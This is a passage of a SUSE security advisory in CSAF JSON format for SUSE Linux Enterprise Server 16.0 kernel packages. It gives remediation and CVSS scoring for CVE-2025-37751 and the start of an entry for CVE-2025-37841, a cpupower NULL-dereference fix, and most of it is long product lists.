"url": "https://bugzilla.suse.com/1242505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37751"
},
{
"cve": "CVE-2025-37841",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37841"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npm: cpupower: bench: Prevent NULL dereference on malloc failure\n\nIf malloc returns NULL due to low memory, \u0027config\u0027 pointer can be NULL.\nAdd a check to prevent NULL dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
